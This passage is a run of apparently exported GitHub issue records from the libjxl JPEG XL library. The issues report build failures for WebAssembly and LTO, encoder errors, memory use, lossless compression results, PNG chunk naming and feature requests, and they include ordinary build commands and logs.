- cjxl version string: [cjxl v0.12.0 798512a [_AVX2_,SSE4,SSE2]]
**Additional context**
Add any other context about the problem here.
| Image cannot be encoded with -m 1 -e 9 -q 48, Logic error: couldn't rebalance a histogram | https://api.github.com/repos/libjxl/libjxl/issues/4159/comments | 3 | 2025-03-20T14:38:11Z | 2025-04-11T12:32:19Z | https://github.com/libjxl/libjxl/issues/4159 | 2,935,721,925 | 4,159 |
[
"libjxl",
"libjxl"
] | **Describe the bug**
I am unable to build libjxl for Webassembly.
I am following [this page](https://github.com/libjxl/libjxl/blob/main/doc/building_wasm.md).
**To Reproduce**
To be precise, starting from scratch, the steps to reproduce in Ubuntu in Windows Subsystem for Linux are:
```bash
sudo apt-get update
sudo apt install cmake
sudo apt install ninja-build
cd ~
git clone https://github.com/emscripten-core/emsdk.git
cd emsdk
./emsdk install latest
./emsdk activate latest
source ./emsdk_env.sh
cd ~
git clone https://github.com/libjxl/libjxl.git
cd libjxl
git submodule update --init --recursive
BUILD_TARGET=wasm32 emconfigure ./ci.sh release
```
The last line is the failing one, and produces the following:
```bash
(base) kaba@Laptop-2593:~/libjxl$ BUILD_TARGET=wasm32 emconfigure ./ci.sh release
configure: ./ci.sh release
+ cmd_release
+ CMAKE_BUILD_TYPE=Release
+ strip_dead_code
+ [[ wasm32 == wasm* ]]
+ return 0
+ cmake_configure
+ export_env
+ [[ wasm32 == *mingw32 ]]
++ /home/kaba/emsdk/upstream/emscripten/emcc -print-prog-name=llvm-symbolizer
emcc: error: no input files
++ true
+ LLVM_SYMBOLIZER=
+ [[ -n '' ]]
+ [[ 0 == 1 ]]
+ args=('-B/home/kaba/libjxl/build-wasm32' '-H/home/kaba/libjxl' '-DCMAKE_BUILD_TYPE=Release' '-G' 'Ninja' '-DCMAKE_CXX_FLAGS= ' '-DCMAKE_C_FLAGS= ' '-DCMAKE_EXE_LINKER_FLAGS=' '-DCMAKE_MODULE_LINKER_FLAGS=' '-DCMAKE_SHARED_LINKER_FLAGS=' '-DJPEGXL_VERSION=' '-DSANITIZER=none' '-DJPEGXL_ENABLE_VIEWERS=ON' '-DJPEGXL_ENABLE_PLUGINS=ON' '-DJPEGXL_ENABLE_DEVTOOLS=ON' '-DJPEGXL_FUZZER_LINK_FLAGS=-fsanitize=fuzzer')
+ local args
+ [[ wasm32 != *mingw32 ]]
+ args+=(-DJPEGXL_WARNINGS_AS_ERRORS=ON)
+ [[ -n wasm32 ]]
+ local system_name=Linux
+ [[ wasm32 == *mingw32 ]]
+ [[ wasm32 != wasm* ]]
+ args+=(-DSJPEG_ENABLE_SIMD=OFF -DBUILD_SHARED_LIBS=OFF)
+ args+=(-DCMAKE_CROSSCOMPILING=1 -DHAVE_STD_REGEX=0 -DHAVE_POSIX_REGEX=0 -DHAVE_GNU_POSIX_REGEX=0 -DHAVE_STEADY_CLOCK=0 -DHAVE_THREAD_SAFETY_ATTRIBUTES=0)
+ [[ -z '' ]]
+ CMAKE_FIND_ROOT_PATH=/usr/wasm32
+ [[ -z '' ]]
+ CMAKE_PREFIX_PATH=/usr/wasm32
++ which wasm32-pkg-config
++ true
+ local pkg_config=
+ [[ -z '' ]]
++ which pkg-config
+ pkg_config=
+ retcode=1
emconfigure: error: './ci.sh release' failed (returned 1)
```
The culprit is this line which is executed by `ci.sh:291`:
```bash
LLVM_SYMBOLIZER=$("${CC:-clang}" -print-prog-name=llvm-symbolizer || true)
````
which expands to:
```bash
emcc -print-prog-name=llvm-symbolizer
```
Running it in isolation results in
```
emcc: error: no input files
```
Because emcc errors here, so does the `ci.sh` script.
As an attempt to work around this, I replaced line 291 with
```
LLVM_SYMBOLIZER=""
```
This allows the script to continue, but it then it hits another error for which it does not give any hints on what happened. However, I suspect that that problem may be the TestBigEndian problem described below.
**Expected behavior**
Building Webassembly should succeed.
**Other stuff**
I also tried `emcmake` instead of `emconfigure`:
```
BUILD_TARGET=wasm32 emcmake cmake -G Ninja -B build
```
This result in the following:
```bash
(base) kaba@Laptop-2593:~/libjxl$ BUILD_TARGET=wasm32 emcmake cmake -G Ninja -B build
configure: cmake -G Ninja -B build -DCMAKE_TOOLCHAIN_FILE=/home/kaba/emsdk/upstream/emscripten/cmake/Modules/Platform/Emscripten.cmake -DCMAKE_CROSSCOMPILING_EMULATOR=/home/kaba/emsdk/node/20.18.0_64bit/bin/node
-- CMAKE_SYSTEM_PROCESSOR is x86_64
-- Could NOT find PkgConfig (missing: PKG_CONFIG_EXECUTABLE)
-- tcmalloc version -- tcmalloc 2.8.0 disabled due to https://github.com/gperftools/gperftools/issues/1204
-- Check if the system is big endian
-- Searching 16 bit integer
CMake Error at /usr/share/cmake-3.22/Modules/TestBigEndian.cmake:72 (message):
no suitable type found
Call Stack (most recent call first):
/usr/share/cmake-3.22/Modules/TestBigEndian.cmake:37 (__TEST_BIG_ENDIAN_LEGACY_IMPL)
CMakeLists.txt:119 (test_big_endian)
-- Configuring incomplete, errors occurred!
See also "/home/kaba/libjxl/build/CMakeFiles/CMakeOutput.log".
See also "/home/kaba/libjxl/build/CMakeFiles/CMakeError.log".
emcmake: error: 'cmake -G Ninja -B build -DCMAKE_TOOLCHAIN_FILE=/home/kaba/emsdk/upstream/emscripten/cmake/Modules/Platform/Emscripten.cmake -DCMAKE_CROSSCOMPILING_EMULATOR=/home/kaba/emsdk/node/20.18.0_64bit/bin/node' failed (returned 1)
```
The culprit here is the failure of CMake's TestBigEndian:
```bash
CMake Error at /usr/share/cmake-3.22/Modules/TestBigEndian.cmake:72 (message):
no suitable type found
```
I think Emscripten is supposed to override this test, as can be seen from [here](https://github.com/emscripten-core/emscripten/blob/main/cmake/Modules/TestBigEndian.cmake). I'd assume `emcmake` would do that, but for some reason this file is not picked. This can be seen from the above error message, because it refers to
```/usr/share/cmake-3.22/Modules/TestBigEndian.cmake```
However, Emscripten's version is at:
```~/emsdk/upstream/emscripten/cmake/Modules/TestBigEndian.cmake```
**Environment**
- OS: Ubuntu 22.04.2 LTS (Windows Subsystem for Linux in Windows 11)
- Compiler version: emcc (Emscripten gcc/clang-like replacement + linker emulating GNU ld) 4.0.5 (53b38d0c6f9fce1b62c55a8012bc6477f7a42711)
- CPU type: x64
- cjxl/djxl version string: ?? latest clone of libjxl from github
| Cannot build libjxl for Webassembly | https://api.github.com/repos/libjxl/libjxl/issues/4158/comments | 1 | 2025-03-20T01:17:49Z | 2025-03-20T04:42:44Z | https://github.com/libjxl/libjxl/issues/4158 | 2,933,654,311 | 4,158 |
[
"libjxl",
"libjxl"
] | The current build of cjxl fails after few seconds attemping to encode a particular image using -e 11.
```
D:\>cjxl awd.png awd.jxl -d 0 --allow_expert_options -e 11
JPEG XL encoder v0.12.0 0f2d2f7 [_AVX2_,SSE2]
Encoding [Modular, lossless, effort: 11]
JxlEncoderProcessOutput failed.
EncodeImageJXL() failed.
```
The attached PNG image triggers the error.
[PNG file](https://github.com/user-attachments/assets/36dd0e6f-94e2-4e6b-891b-84f9a22cec38) | cjxl -e 11 fails on a small image | https://api.github.com/repos/libjxl/libjxl/issues/4157/comments | 5 | 2025-03-19T22:31:30Z | 2025-04-12T06:35:12Z | https://github.com/libjxl/libjxl/issues/4157 | 2,933,351,582 | 4,157 |
[
"libjxl",
"libjxl"
] | **Describe the solution you'd like**
Research version, add harder lossless compression method, like CM, Advanced Wavelets...
I test first, and for some image ZPAQ beat jxl e10. JXL is slowly becoming the standard, even microsoft has added a decoder, need to prepare an extension (experimental version), and a decoder compatible with the old standard.
Asked chatgpt for method doesn't used, list:
1) Block-wise BWT + MTF stages for modular or transformed data.
2) CMYK-tailored predictors optimized for print-oriented content.
3) Optional wavelet-based transforms for low-frequency-heavy images.
4) Adaptive channel decorrelation based on local channel correlation.
5) Joint bit-level context modeling across channels for specialized datasets.
6) Context Mixing
Would be appreciated to know what algorithms are already in use. Thanks. | Research Vers? | https://api.github.com/repos/libjxl/libjxl/issues/4156/comments | 1 | 2025-03-18T12:23:55Z | 2025-03-19T12:44:25Z | https://github.com/libjxl/libjxl/issues/4156 | 2,928,335,941 | 4,156 |
[
"libjxl",
"libjxl"
] | **Describe the bug**
Example executables do not run on Windows, because `jxl.dll` is contained in `\lib` directory, not in the root directory where the executable is.
**To Reproduce**
* Build under Windows.
* Go to the build directory: `cd c:\code\libjxl\out\build\x64-Clang-Release`
* Run `encode_oneshot`.
* Get Windows error on not finding `jxl.dll`.
**Expected behavior**
Running `encode_oneshot` and other example executables should work out of the box.
**Environment**
- OS: Windows 11
- Compiler version: Visual Studio 2022 17.13.3 (but built using its Clang)
- CPU type: x64
**Additional context**
I can think of several ways to solve the problem:
* Option 1: Move the executables into the `\lib` directory. This is simple, but logically the example-executables do not belong with the library.
* Option 2: Make the user add `lib` into the Windows path (i.e. current solution). This is not nice.
* Option 3: Create a separate directory `\examples`, which contains the executables, as well as copies of `jxl.dll` (and whatever other files are needed to run them).
<!--
Currently github does not allow uploading files that end in `.jxl`, but when you
rename them for example as `image.jxl.jpg`, it will be possible to upload them
and also view them in browsers that are configured to support it.
See https://github.com/orgs/github-community/discussions/18139
-->
| Example executables do not run on Windows, because jxl.dll is contained in lib directory, not in root directory. | https://api.github.com/repos/libjxl/libjxl/issues/4155/comments | 0 | 2025-03-18T01:24:06Z | 2025-03-18T01:24:06Z | https://github.com/libjxl/libjxl/issues/4155 | 2,926,799,065 | 4,155 |
[
"libjxl",
"libjxl"
] | Dear maintainers,
in Debian it was tried to build version 0.11.1 while enabling LTO (see [1] for the full build log on i386 but on other architectures it faild with the same problem). When enabling LTO, there seems to be an undefined reference to `jxl::extras::PackedFrame::~PackedFrame()` for several tests, e.g.:
```
[334/418] : && /usr/bin/c++ -g -O2 -ffile-prefix-map=/build/reproducible-path/jpeg-xl-0.11.1=. -flto=auto -ffat-lto-objects -fstack-protector-strong -Wformat -Werror=format-security -fexcess-precision=fast -DJXL_DEBUG_WARNING -DJXL_DEBUG_ON_ERROR -Wdate-time -D_FORTIFY_SOURCE=2 -fno-rtti -flto=auto -ffat-lto-objects -Wl,-z,relro -Wl,-z,now -fPIE -pie -Wl,--dependency-file=lib/CMakeFiles/color_description_test.dir/link.d lib/CMakeFiles/color_description_test.dir/extras/dec/color_description_test.cc.o -o lib/tests/color_description_test -Wl,-rpath,/build/reproducible-path/jpeg-xl-0.11.1/obj-i686-linux-gnu/lib lib/libjxl_testlib-internal.a lib/libjxl_extras-internal.a /usr/lib/i386-linux-gnu/libgtest_main.a /usr/lib/i386-linux-gnu/libgtest.a lib/libjxl-internal.a /usr/lib/i386-linux-gnu/libhwy.so /usr/lib/i386-linux-gnu/libbrotlidec.so /usr/lib/i386-linux-gnu/libbrotlicommon.so /usr/lib/i386-linux-gnu/libbrotlienc.so lib/libjxl_cms.so.0.11.1 lib/libjxl_threads.so.0.11.1 /usr/lib/i386-linux-gnu/libgif.so /usr/lib/i386-linux-gnu/libjpeg.so /usr/lib/i386-linux-gnu/libpng.so /usr/lib/i386-linux-gnu/libz.so /usr/lib/i386-linux-gnu/libOpenEXR-3_1.so /usr/lib/i386-linux-gnu/libOpenEXRUtil-3_1.so /usr/lib/i386-linux-gnu/libOpenEXRCore-3_1.so /usr/lib/i386-linux-gnu/libIex-3_1.so /usr/lib/i386-linux-gnu/libIlmThread-3_1.so /usr/lib/i386-linux-gnu/libImath-3_1.so && cd /build/reproducible-path/jpeg-xl-0.11.1/obj-i686-linux-gnu/lib && /usr/bin/cmake -D TEST_TARGET=color_description_test -D TEST_EXECUTABLE=/build/reproducible-path/jpeg-xl-0.11.1/obj-i686-linux-gnu/lib/tests/color_description_test -D TEST_EXECUTOR= -D TEST_WORKING_DIR=/build/reproducible-path/jpeg-xl-0.11.1/obj-i686-linux-gnu/lib -D TEST_EXTRA_ARGS= -D TEST_PROPERTIES= -D TEST_PREFIX= -D TEST_SUFFIX= -D TEST_FILTER= -D NO_PRETTY_TYPES=FALSE -D NO_PRETTY_VALUES=FALSE -D TEST_LIST=color_description_test_TESTS -D CTEST_FILE=/build/reproducible-path/jpeg-xl-0.11.1/obj-i686-linux-gnu/lib/color_description_test[1]_tests.cmake -D TEST_DISCOVERY_TIMEOUT=240 -D TEST_DISCOVERY_EXTRA_ARGS= -D TEST_XML_OUTPUT_DIR= -P /usr/share/cmake-3.31/Modules/GoogleTestAddTests.cmake
FAILED: lib/tests/color_description_test lib/color_description_test[1]_tests.cmake /build/reproducible-path/jpeg-xl-0.11.1/obj-i686-linux-gnu/lib/color_description_test[1]_tests.cmake
: && /usr/bin/c++ -g -O2 -ffile-prefix-map=/build/reproducible-path/jpeg-xl-0.11.1=. -flto=auto -ffat-lto-objects -fstack-protector-strong -Wformat -Werror=format-security -fexcess-precision=fast -DJXL_DEBUG_WARNING -DJXL_DEBUG_ON_ERROR -Wdate-time -D_FORTIFY_SOURCE=2 -fno-rtti -flto=auto -ffat-lto-objects -Wl,-z,relro -Wl,-z,now -fPIE -pie -Wl,--dependency-file=lib/CMakeFiles/color_description_test.dir/link.d lib/CMakeFiles/color_description_test.dir/extras/dec/color_description_test.cc.o -o lib/tests/color_description_test -Wl,-rpath,/build/reproducible-path/jpeg-xl-0.11.1/obj-i686-linux-gnu/lib lib/libjxl_testlib-internal.a lib/libjxl_extras-internal.a /usr/lib/i386-linux-gnu/libgtest_main.a /usr/lib/i386-linux-gnu/libgtest.a lib/libjxl-internal.a /usr/lib/i386-linux-gnu/libhwy.so /usr/lib/i386-linux-gnu/libbrotlidec.so /usr/lib/i386-linux-gnu/libbrotlicommon.so /usr/lib/i386-linux-gnu/libbrotlienc.so lib/libjxl_cms.so.0.11.1 lib/libjxl_threads.so.0.11.1 /usr/lib/i386-linux-gnu/libgif.so /usr/lib/i386-linux-gnu/libjpeg.so /usr/lib/i386-linux-gnu/libpng.so /usr/lib/i386-linux-gnu/libz.so /usr/lib/i386-linux-gnu/libOpenEXR-3_1.so /usr/lib/i386-linux-gnu/libOpenEXRUtil-3_1.so /usr/lib/i386-linux-gnu/libOpenEXRCore-3_1.so /usr/lib/i386-linux-gnu/libIex-3_1.so /usr/lib/i386-linux-gnu/libIlmThread-3_1.so /usr/lib/i386-linux-gnu/libImath-3_1.so && cd /build/reproducible-path/jpeg-xl-0.11.1/obj-i686-linux-gnu/lib && /usr/bin/cmake -D TEST_TARGET=color_description_test -D TEST_EXECUTABLE=/build/reproducible-path/jpeg-xl-0.11.1/obj-i686-linux-gnu/lib/tests/color_description_test -D TEST_EXECUTOR= -D TEST_WORKING_DIR=/build/reproducible-path/jpeg-xl-0.11.1/obj-i686-linux-gnu/lib -D TEST_EXTRA_ARGS= -D TEST_PROPERTIES= -D TEST_PREFIX= -D TEST_SUFFIX= -D TEST_FILTER= -D NO_PRETTY_TYPES=FALSE -D NO_PRETTY_VALUES=FALSE -D TEST_LIST=color_description_test_TESTS -D CTEST_FILE=/build/reproducible-path/jpeg-xl-0.11.1/obj-i686-linux-gnu/lib/color_description_test[1]_tests.cmake -D TEST_DISCOVERY_TIMEOUT=240 -D TEST_DISCOVERY_EXTRA_ARGS= -D TEST_XML_OUTPUT_DIR= -P /usr/share/cmake-3.31/Modules/GoogleTestAddTests.cmake
/usr/bin/ld: lib/libjxl_extras-internal.a(exr.cc.o): in function `jxl::extras::PackedImage::BitsPerChannel(JxlDataType)':
./obj-i686-linux-gnu/./lib/extras/packed_image.h:100:(.text+0x1b3): undefined reference to `jxl::Debug(char const*, ...)'
/usr/bin/ld: lib/libjxl_extras-internal.a(exr.cc.o): in function `jxl::extras::DecodeImageEXR(jxl::Span<unsigned char const>, jxl::extras::ColorHints const&, jxl::extras::PackedPixelFile*, jxl::SizeConstraints const*)':
./obj-i686-linux-gnu/./lib/extras/dec/exr.cc:124:(.text+0x2b9): undefined reference to `jxl::StatusMessage(jxl::Status, char const*, ...)'
/usr/bin/ld: ./obj-i686-linux-gnu/./lib/extras/dec/exr.cc:153:(.text+0x4db): undefined reference to `jxl::extras::PackedFrame::Create(unsigned int, unsigned int, JxlPixelFormat const&)'
/usr/bin/ld: ./obj-i686-linux-gnu/./lib/extras/dec/exr.cc:153:(.text+0x514): undefined reference to `jxl::StatusMessage(jxl::Status, char const*, ...)'
/usr/bin/ld: lib/libjxl_extras-internal.a(exr.cc.o): in function `jxl::extras::PackedFrame& std::vector<jxl::extras::PackedFrame, std::allocator<jxl::extras::PackedFrame> >::emplace_back<jxl::extras::PackedFrame>(jxl::extras::PackedFrame&&)':
/usr/include/c++/14/bits/vector.tcc:123:(.text+0xdad): undefined reference to `void std::vector<jxl::extras::PackedFrame, std::allocator<jxl::extras::PackedFrame> >::_M_realloc_append<jxl::extras::PackedFrame>(jxl::extras::PackedFrame&&)'
/usr/bin/ld: lib/libjxl_extras-internal.a(exr.cc.o): in function `jxl::extras::DecodeImageEXR(jxl::Span<unsigned char const>, jxl::extras::ColorHints const&, jxl::extras::PackedPixelFile*, jxl::SizeConstraints const*)':
./obj-i686-linux-gnu/./lib/extras/dec/exr.cc:157:(.text.unlikely+0x138): undefined reference to `jxl::extras::PackedFrame::~PackedFrame()'
/usr/bin/ld: lib/libjxl_extras-internal.a(exr.cc.o): in function `jxl::StatusOr<jxl::extras::PackedFrame>::~StatusOr()':
./obj-i686-linux-gnu/./lib/jxl/base/status.h:337:(.text.unlikely+0x150): undefined reference to `jxl::extras::PackedFrame::~PackedFrame()'
```
Building without LTO works just fine (see [2] for the full build log for comparison), so for now LTO is disabled in the debian builds (it used to work though for version 0.10.2 and strangely also works in the quite similar Ubuntu 25.04). Maybe you have an idea, what the root cause could be?
Best regards.
[1] https://buildd.debian.org/status/fetch.php?pkg=jpeg-xl&arch=i386&ver=0.11.1-1&stamp=1739052249&raw=0
[2] https://buildd.debian.org/status/fetch.php?pkg=jpeg-xl&arch=i386&ver=0.11.1-2&stamp=1741995098&raw=0 | Tests fail to build with LTO enabled | https://api.github.com/repos/libjxl/libjxl/issues/4152/comments | 0 | 2025-03-15T08:32:31Z | 2025-03-15T08:32:31Z | https://github.com/libjxl/libjxl/issues/4152 | 2,921,904,143 | 4,152 |
[
"libjxl",
"libjxl"
] | Found an image in which all other lossless methods, even PNG and gzip, beat lossless JPEG XL effort 11. (I used 7-zip -mx9 to create the gzip file.)
262144 cove.tga
24575 cove_effort06.jxl
22692 cove_effort07.jxl
18439 cove_effort08.jxl
16644 cove_effort09.jxl
15075 cove_effort10.jxl
10885 cove_effort11.jxl
10659 cove.tga.gz
10427 cove.png
10284 cove.tga.bz3
9557 cove.tga.bz2
9400 cove.tga.zpaq
8460 cove.tga.xz
7396 cove.tga.extreme10.xz
The image file is "Ultima V Tile - Cove 1 1x .tga", a map of a place in Ultima 5, a game released in 1988. Files available here: [https://ultima5.ultimacodex.com/?sdm_process_download=1&download_id=5580](url) | jpeg xl worst at lossless compress of old game image | https://api.github.com/repos/libjxl/libjxl/issues/4150/comments | 11 | 2025-03-11T22:53:07Z | 2025-05-23T13:34:57Z | https://github.com/libjxl/libjxl/issues/4150 | 2,912,056,710 | 4,150 |
[
"libjxl",
"libjxl"
] | Hi )
I use XnView MP latest version https://www.xnview.com/ , I known what theee used JPEG LI encoder and decoder , how much I known , there use MOZJPEG or JPEGLI for reading / decoding JPEG files , but have problem , very big problem....
This is original sample , crop from camera

This is Floyd steinberg dither in XnConvert 1.104

This is ACDSee Pro sample

as you can see , in ACDSSee Pro 5.0 with IDE_ACDstd 5.0.56.0000 gradient quality highest and absent rude colors.
please create dither in JPEGLI decoder with quality as in ACDSee Pro 5.0 | Dither for decoding any JPEG files | https://api.github.com/repos/libjxl/libjxl/issues/4146/comments | 2 | 2025-03-08T18:19:24Z | 2025-06-18T21:18:03Z | https://github.com/libjxl/libjxl/issues/4146 | 2,904,945,223 | 4,146 |
[
"libjxl",
"libjxl"
] | **Describe the bug**
The `clamp` parameter used by multiple functions in alpha.cc sometimes means "clamp the value", and sometimes means "don't clamp the value".
`float fga = clamp ? Clamp(fg.a[x]) : fg.a[x];`
vs
`float fa = clamp ? fga[x] : Clamp(fga[x]);`
This might or might not be a bug.
If it is a bug:
- The spec needs to be read to verify that the spec doesn't have the same bug.
- The conformance tests needs to be extended to capture it.
If it is not a bug:
- The parameter should (in the cases where it means "don't clamp the value") renamed to something that makes it more clear that this is what it does. | `clamp` in alpha.cc has unclear meaning and usage | https://api.github.com/repos/libjxl/libjxl/issues/4143/comments | 1 | 2025-03-06T14:28:08Z | 2025-04-18T15:33:07Z | https://github.com/libjxl/libjxl/issues/4143 | 2,900,571,135 | 4,143 |
[
"libjxl",
"libjxl"
] | Hello,
With jxl 0.11.1 on windows 10 pro 64bits
When losslessly converting 24 bits png images into jxl images, I does not get any problem. The issue arises when losslessly converting a 256 color-paletted png image:
1) the resulting jxl image is coded on 24 bits (8 bit per color), which is not an issue by itself, as the 256 colors can be losslessly recoded in this way, but
2) the resulting jxl image is not exactly the same as the the png image (but the difference is tiny)
I wonder if it is a bug or a bad parametrization on my side.
In the attached zip, I put an example.
The 256 colors image test.png was converted into a jxl image with "cjxl test.png test.jxl -d 0"
The jxl image was back converted into the png image using "djxl test.jxl test_back.png"
It turns out test_back.png and test.jxl are identical, but both differ from the original test.png.
I computed the difference between the two png pixel by pixel.
For most of the pixels the difference is 0 for R, G, and B as expected, but for a few pixels, the difference was R=1,G=1,B=1, R=2,G=2,B=2, or R=3,G=3,
In the zip, I included a difference.png file where the differences where multiplied by 50 to make them visible by the naked eye (this concerns mainly the four W in the middle of the image)
[test.zip](https://github.com/user-attachments/files/19055865/test.zip)
Thanks
S.
Edit: I have just seen that saving the 256 color paletted png into a 24 bit png image results in exactly the same issue. So it seems there are two quite distinct components in my previous test
1) the lossless conversion of a 256 color paletted png image into a 24 bit one is not exactly lossless (png bug ?)
2) the lossless conversion of a 256 color paletted png image into a jxl image by default forced the colors to be recoded on 24 bits. It is not clear for me if there is a means to tell cjxl to keep the palette. | Lossless tranformation of a png file into a jxl file may not be really lossless for paletted images | https://api.github.com/repos/libjxl/libjxl/issues/4139/comments | 1 | 2025-03-03T16:11:03Z | 2025-03-12T12:36:30Z | https://github.com/libjxl/libjxl/issues/4139 | 2,891,676,509 | 4,139 |
[
"libjxl",
"libjxl"
] | Bitmap data to encode are `JXL_TYPE_UINT16` grayscale - I'll attach one sample.
`EncodeFrame` calls `FindTextLikePatches` that could consume really large amount of memory (I saw values like 1GB under debugger).
In the function `FindTextLikePatches` all values in the `screenshot_row` array are 1 and the following code causes the enorme allocations:
```
std::vector<
std::pair<std::pair<uint32_t, uint32_t>, std::pair<uint32_t, uint32_t>>>
queue;
size_t queue_front = 0;
for (size_t y = 0; y < frame_dim.ysize; y++) {
for (size_t x = 0; x < frame_dim.xsize; x++) {
if (!screenshot_row[screenshot_stride * (y / kPatchSide) +
(x / kPatchSide)])
continue;
queue.push_back({{x, y}, {x, y}});
}
}
```
When we encode 16 images at the same time we exhaust all available memory. Consequently the `push_back` might throw `std::bad_alloc` that is not handled in the library and therefore leads to `std::abort`.
 | Extreme memory consumption inside EncodeFrame in libjxl 0.11.1 | https://api.github.com/repos/libjxl/libjxl/issues/4138/comments | 2 | 2025-03-03T09:51:10Z | 2025-03-04T08:55:43Z | https://github.com/libjxl/libjxl/issues/4138 | 2,890,721,397 | 4,138 |
[
"libjxl",
"libjxl"
] | 1) Run `djxl` on the first Adobe HDR/gain map test image here:
https://helpx.adobe.com/camera-raw/using/gain-map.html
(Download "gain map sample photos"; copyright on the first is Eric Chan IRC - it's the "forest" one which shows the sun.)
```
djxl 01_base_hdr.{jxl,png}
```
2) Now examine the resultant image, `01_base_hdr.png` using `pngcheck -v` from `https://github.com/pnggroup/pngcheck`:
Observe: pngcheck fails.
Expect: pngcheck to succeed
The chunk name should be cLLI, not cLLi, however that chunk name is not yet approved either (the specification is not yet at DIS stage.)
Version (libjxl): 0.11.1
Platform: gentoo ~ (dev) | djxl 0.11.1 PNG: incorrect chunk name cLLi should be cLLI | https://api.github.com/repos/libjxl/libjxl/issues/4137/comments | 1 | 2025-03-03T01:39:38Z | 2025-04-27T03:08:55Z | https://github.com/libjxl/libjxl/issues/4137 | 2,889,954,310 | 4,137 |
[
"libjxl",
"libjxl"
] | I am encoding an image. All functions work fine until JxlEncoderAddImageFrame which returns JXL_ENC_ERROR. How to get exact error? | JxlEncoderAddImageFrame is failing. How to get exact error? | https://api.github.com/repos/libjxl/libjxl/issues/4131/comments | 3 | 2025-02-27T09:33:32Z | 2025-02-28T20:13:46Z | https://github.com/libjxl/libjxl/issues/4131 | 2,883,949,477 | 4,131 |
[
"libjxl",
"libjxl"
] | null | Investigate a huge difference in `FlushTestLosslessProgressiveAlpha` in PR #4111 | https://api.github.com/repos/libjxl/libjxl/issues/4129/comments | 0 | 2025-02-25T19:45:37Z | 2025-02-25T19:45:37Z | https://github.com/libjxl/libjxl/issues/4129 | 2,879,407,155 | 4,129 |
[
"libjxl",
"libjxl"
] | ```
function DecodeJpegXlOneShot(const jxl: PByte; size: NativeUInt; out pixels: TBytes;
out xsize, ysize: NativeUInt; out icc_profile: TBytes): Boolean;
var
dec: PJxlDecoder;
status: JxlDecoderStatus;
info: JxlBasicInfo;
format: JxlPixelFormat;
buffer_size: Cardinal;//NativeUInt;
icc_size: Cardinal; // NativeUInt;
ret: JxlDecoderStatus;
begin
Result := False;
dec := JxlDecoderCreate(nil);
if JxlDecoderSubscribeEvents(dec, Integer(JXL_DEC_BASIC_INFO) or
Integer(JXL_DEC_COLOR_ENCODING) or Integer(JXL_DEC_FULL_IMAGE)) <> JXL_DEC_SUCCESS then
begin
WriteLn(ErrOutput, 'JxlDecoderSubscribeEvents failed');
Exit;
end;
format.num_channels := 4;
format.data_type := JXL_TYPE_UINT8;
format.endianness := JXL_NATIVE_ENDIAN ;
format.align := 0;
JxlDecoderSetInput(dec, jxl, size);
JxlDecoderCloseInput(dec);
while True do
begin
status := JxlDecoderProcessInput(dec);
case status of
JXL_DEC_ERROR:
begin
WriteLn(ErrOutput, 'Decoder error');
Exit;
end;
JXL_DEC_NEED_MORE_INPUT:
begin
WriteLn(ErrOutput, 'Unexpected need for more input');
Exit;
end;
JXL_DEC_BASIC_INFO:
begin
if JxlDecoderGetBasicInfo(dec, @info) <> JXL_DEC_SUCCESS then
begin
WriteLn('JxlDecoderGetBasicInfo failed');
Exit;
end;
xsize := info.xsize;
ysize := info.ysize;
writeln('step2');
end;
JXL_DEC_COLOR_ENCODING:
begin
end;
JXL_DEC_NEED_IMAGE_OUT_BUFFER:
begin
if JxlDecoderImageOutBufferSize(dec, @format, @buffer_size) <> JXL_DEC_SUCCESS then
begin
WriteLn('JxlDecoderImageOutBufferSize failed');
Exit;
end;
if buffer_size <> xsize * ysize * 4 then
begin
WriteLn( SysUtils.Format('Invalid buffer size %d vs %d', [buffer_size, xsize * ysize * 4]));
Exit;
end;
SetLength(pixels, xsize * ysize * 4);
ret := JxlDecoderSetImageOutBuffer(dec, @format, @pixels[0], Length(pixels) ); //here return error
if ret <> JXL_DEC_SUCCESS then
begin
WriteLn(ErrOutput, 'JxlDecoderSetImageOutBuffer failed');
Exit;
end;
end;
JXL_DEC_FULL_IMAGE: ; // Continue processing
JXL_DEC_SUCCESS:
begin
Result := True;
Exit;
end;
else
begin
WriteLn(ErrOutput, 'Unknown decoder status');
Exit;
end;
end;
end;
end;
``` | JxlDecoderSetImageOutBuffer returns error | https://api.github.com/repos/libjxl/libjxl/issues/4122/comments | 0 | 2025-02-25T12:03:45Z | 2025-02-25T19:15:27Z | https://github.com/libjxl/libjxl/issues/4122 | 2,878,175,951 | 4,122 |
[
"libjxl",
"libjxl"
] | https://github.com/libjxl/libjxl/pull/4112
### Description
RLE encoding procedure has a bug that skips one symbol after each run. It provides still valid results for encoding further, just some unnecessary additional run stops appear in the sequence, reducing the ability to compress histogram. This fix corrects "off-by-1" bug and provides then slightly better compression: that is why hardcoded sizes of output in several tests are corrected down as well.
Example:
```
{12, 12, 13, 14, 15, 15, 15, 15, 7, 8, 6} histogram
{2, 0, 0, 1, 0, 3, 0, 0, 0, 1, 1} current same with +1
{2, 0, 1, 1, 4, 0, 0, 0, 1, 1, 1} correct same without +1
```
| Investigate compatibility / possible problems with JXL files in the wild. | https://api.github.com/repos/libjxl/libjxl/issues/4115/comments | 0 | 2025-02-24T07:47:13Z | 2025-02-24T07:47:48Z | https://github.com/libjxl/libjxl/issues/4115 | 2,874,105,919 | 4,115 |
[
"libjxl",
"libjxl"
] | **Is your feature request related to a problem? Please describe.**
I'm trying to understand why Rec. 2020/2100 PQ JPEG XL files exported from Lightroom Classic sometimes show up with the SDR range darkened in Apple's viewers and sometimes don't.
**Describe the solution you'd like**
I'd like libjxl to ship a command line tool alongside cjxl and djxl for modifying the JPEG XL color metadata strictly without changing the XYB pixel data. This would allow for things like varying the intensity_target value to see if it affects anything in a given viewer or changing a Display P3 image to declare Rec. 2020/2100 PQ to see how a notionally HDR file with all data within the P3 SDR range (assuming I understand correctly how JPEG XL maps the external color spaces to and from XYB) is handled. This would also allow changing the rendering intent value to see how a given viewer handles the different rendering intent values.
**Describe alternatives you've considered**
I have considered locating the right bits in a hex editor, but it seems too difficult.
I've tried the `--intensity_target` and `-x color_space=` options of cjxl when the input is a JPEG XL file, but 1) I can't be sure that `--intensity_target` doesn't alter what goes into the pixel data and 2) `-x color_space=` seems to have no effect when the input file is a JPEG XL file. | [Feature request] Tool for modifying the color metadata without changing the pixel data | https://api.github.com/repos/libjxl/libjxl/issues/4113/comments | 1 | 2025-02-16T18:04:02Z | 2025-02-17T12:39:42Z | https://github.com/libjxl/libjxl/issues/4113 | 2,856,246,622 | 4,113 |
[
"libjxl",
"libjxl"
